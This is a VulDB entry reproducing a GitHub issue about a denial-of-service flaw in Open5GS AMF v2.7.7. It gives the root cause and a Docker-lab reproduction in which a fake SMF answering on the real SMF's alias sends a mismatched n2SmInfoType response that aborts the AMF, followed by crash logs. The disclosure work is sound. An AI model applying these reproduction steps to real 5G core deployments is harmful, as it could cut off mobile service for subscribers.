| عنوان | Open5gs AMF v2.7.7 Denial of Service |
|---|
| الوصف | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF aborts when an SMF returns a successful:
```text
POST /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify
```
response that includes `SmContextUpdatedData.n2SmInfoType =
PDU_RES_SETUP_REQ`, but the outstanding AMF transaction state is not one of the
three states that branch accepts.
In `amf_nsmf_pdusession_handle_update_sm_context()`, the `PDU_RES_SETUP_REQ`
branch only accepts:
- `AMF_UPDATE_SM_CONTEXT_REGISTRATION_REQUEST`
- `AMF_UPDATE_SM_CONTEXT_SERVICE_REQUEST`
- `AMF_UPDATE_SM_CONTEXT_HANDOVER_REQUIRED`
Any other in-flight state hits:
```c
ogs_error("Invalid STATE[%d]", state);
ogs_assert_if_reached();
```
at `../src/amf/nsmf-handler.c:364-365`.
This is a separate client-response bug from the already documented
`/modify` success response missing `n2SmInfo`, which crashes at
`../src/amf/nsmf-handler.c:646`.
### Root Cause
- Entry chain:
active AMF `/modify` transaction
-> SMF success response with `n2SmInfo` present
-> `amf_nsmf_pdusession_handle_update_sm_context()`
-> `PDU_RES_SETUP_REQ` switch arm
-> invalid AMF state
- Crash site:
`../src/amf/nsmf-handler.c:365`
- Root cause family:
assertion on impossible success-state combination from untrusted peer response
- Controlling field:
`SmContextUpdatedData.n2SmInfoType`
### Steps to Reproduce
1. Start the Open5GS Docker lab with the normal `smf` and ensure the AMF and
SMF containers are running. In my live setup on 2026-04-12 the relevant
endpoints were:
```text
AMF SBI: http://10.33.33.5:80
SMF SBI: http://10.33.33.6:80
```
2. Start a real gNB and UE with the bundled UERANSIM configs and wait for
successful initial registration plus one active PDU session:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
In my live run, the UE log showed:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
3. Replace the real SMF with the fake SMF responder on the same
`smf.open5gs.org` alias:
```bash
docker rm -f smf amf-fake-smf || true
docker run -d --name amf-fake-smf --network open5gs \
--network-alias smf.open5gs.org \
-v /home/ubuntu/open5gs_277/.audit_tmp:/work \
node:20-alpine sh -lc '
IP=$(hostname -i | awk "{print \$1}")
export AMF_FAKE_SMF_HOST_IP=$IP AMF_FAKE_SMF_PORT=80
export AMF_FAKE_SMF_MODE_FILE=/work/amf_fake_smf.mode
export AMF_FAKE_SMF_LOG_FILE=/work/amf_fake_smf.log
node /work/amf_fake_smf_modify.js'
```
4. Control experiment: configure the fake SMF to return a success response with
no `n2SmInfo`, then trigger a UE-driven `/modify` by releasing the active
PDU session:
```bash
docker exec amf-fake-smf sh -lc 'printf "missing-n2\n" > /work/amf_fake_smf.mode'
docker exec amf-audit-ue /ueransim/nr-cli imsi-001011234567891 -e 'ps-release 1'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
docker logs --since '2026-04-12T16:08:20Z' amf
```
In my live run, the fake SMF received:
```text
POST /nsmf-pdusession/v1/sm-contexts/1/modify mode=missing-n2
```
and the AMF stayed up.
5. Malicious experiment: keep the same live path, but change only the fake SMF
mode so the `/modify` success response includes
`n2SmInfoType=PDU_RES_SETUP_REQ` and one multipart NGAP body:
```bash
docker exec amf-fake-smf sh -lc 'printf "type-mismatch\n" > /work/amf_fake_smf.mode'
docker exec amf-audit-ue /ueransim/nr-cli imsi-001011234567891 -e 'ps-release 1'
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 50 amf
```
### Logs
```shell
PDU session release procedure(s) triggered
exited 134 2026-04-12T16:08:40.833239796Z
04/12 16:07:36.433: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2111)
04/12 16:07:40.127: [amf] INFO: gNB-N2 accepted[10.33.33.8]:60860 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 16:07:40.127: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953)
04/12 16:07:40.135: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 16:07:40.136: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 16:07:40.339: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 16:07:40.339: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 16:07:40.339: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 16:07:40.342: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912)
04/12 16:07:40.342: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688)
04/12 16:07:40.342: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 16:07:40.342: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 16:07:40.344: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] Setup NF Instance [type:AUSF] (../lib/sbi/path.c:307)
04/12 16:07:40.362: [amf] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../src/amf/nausf-handler.c:130)
04/12 16:07:40.362: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../src/amf/nausf-handler.c:130)
04/12 16:07:40.373: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 16:07:40.375: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 16:07:40.389: [amf] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../src/amf/nudm-handler.c:361)
04/12 16:07:40.389: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../src/amf/nudm-handler.c:361)
04/12 16:07:40.390: [sbi] INFO: [5ac5b314-3644-41f1-b7b4-21a7b4c43293] Setup NF Instance [type:PCF] (../lib/sbi/path.c:307)
04/12 16:07:40.395: [amf] INFO: Setup NF EndPoint(fqdn) [pcf.open5gs.org:0] (../src/amf/npcf-handler.c:143)
04/12 16:07:40.395: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../src/amf/npcf-handler.c:143)
04/12 16:07:40.604: [gmm] INFO: [imsi-001011234567891] Registration complete (../src/amf/gmm-sm.c:3146)
04/12 16:07:40.604: [amf] INFO: [imsi-001011234567891] Configuration update command (../src/amf/nas-path.c:609)
04/12 16:07:40.604: [gmm] INFO: UTC [2026-04-12T16:07:40] Timezone[0]/DST[0] (../src/amf/gmm-build.c:551)
04/12 16:07:40.604: [gmm] INFO: LOCAL [2026-04-12T16:07:40] Timezone[0]/DST[0] (../src/amf/gmm-build.c:556)
04/12 16:07:40.604: [amf] INFO: [Added] Number of AMF-Sessions is now 1 (../src/amf/context.c:2798)
04/12 16:07:40.604: [gmm] INFO: UE SUPI[imsi-001011234567891] DNN[internet] LBO[0] S_NSSAI[SST:1 SD:0x1] smContextRef[NULL] smContextResourceURI[NULL] (../src/amf/gmm-handler.c:1419)
04/12 16:07:40.604: [gmm] INFO: V-SMF Instance [b8cf9818-3689-41f1-ba9b-5fb68f0c0330](LIST) (../src/amf/gmm-handler.c:1496)
04/12 16:07:40.604: [gmm] INFO: [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] Setup NF Instance [type:SMF] (../src/amf/gmm-handler.c:1498)
04/12 16:07:40.604: [gmm] INFO: V-SMF Instance [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] (../src/amf/gmm-handler.c:1508)
04/12 16:07:40.604: [gmm] INFO: V-SMF discovered in Non-Roaming or LBO-Roaming[0] (../src/amf/gmm-handler.c:1577)
04/12 16:07:40.604: [gmm] INFO: nsmf_pdusession [1:0x5601bf050090:(nil)] (../src/amf/gmm-handler.c:1617)
04/12 16:07:40.614: [amf] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../src/amf/nsmf-handler.c:140)
04/12 16:07:40.614: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../src/amf/nsmf-handler.c:140)
04/12 16:07:40.626: [amf] INFO: [imsi-001011234567891:1:11][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 16:08:17.442: [sbi] INFO: [b8cf9818-3689-41f1-ba9b-5fb68f0c0330] (NRF-notify) NF_DEREGISTERED event [type:SMF] (../lib/sbi/nnrf-handler.c:1186)
04/12 16:08:25.876: [amf] INFO: [imsi-001011234567891:1:16][0:0:NULL] /nsmf-pdusession/v1/sm-contexts/{smContextRef}/modify (../src/amf/nsmf-handler.c:954)
04/12 16:08:40.714: [amf] ERROR: Invalid STATE[16] (../src/amf/nsmf-handler.c:364)
04/12 16:08:40.714: [amf] FATAL: amf_nsmf_pdusession_handle_update_sm_context: should not be reached. (../src/amf/nsmf-handler.c:365)
04/12 16:08:40.718: [core] FATAL: backtrace() returned 8 addresses (../lib/core/ogs-abort.c:37)
open5gs-amfd(+0x5cb82) [0x5601bd282b82]
open5gs-amfd(+0x4cf17) [0x5601bd272f17]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7f246c65aabc]
open5gs-amfd(+0xba4d) [0x5601bd231a4d]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7f246c64ab4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f246b802ac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f246b893a84]
/usr/local/bin/entrypoint.sh: line 10: 7 Aborted (core dumped) open5gs-amfd "${@}"
```
### Expected behaviour
AMF should reject mismatched `n2SmInfoType` / transaction-state combinations
with a recoverable error path instead of aborting.
### Observed Behaviour
A single malformed SMF success response aborts the AMF process.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7 |
|---|
| المصدر | ⚠️ https://github.com/open5gs/open5gs/issues/4408 |
|---|
| المستخدم | ZiyuLin (UID 93568) |
|---|
| ارسال | 14/04/2026 11:43 AM (2 أشهر منذ) |
|---|
| الاعتدال | 01/05/2026 11:28 AM (17 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 360540 [Open5GS حتى 2.7.7 AMF /src/amf/nsmf-handler.c amf_nsmf_pdusession_handle_update_sm_context الحرمان من الخدمة] |
|---|
| النقاط | 20 |
|---|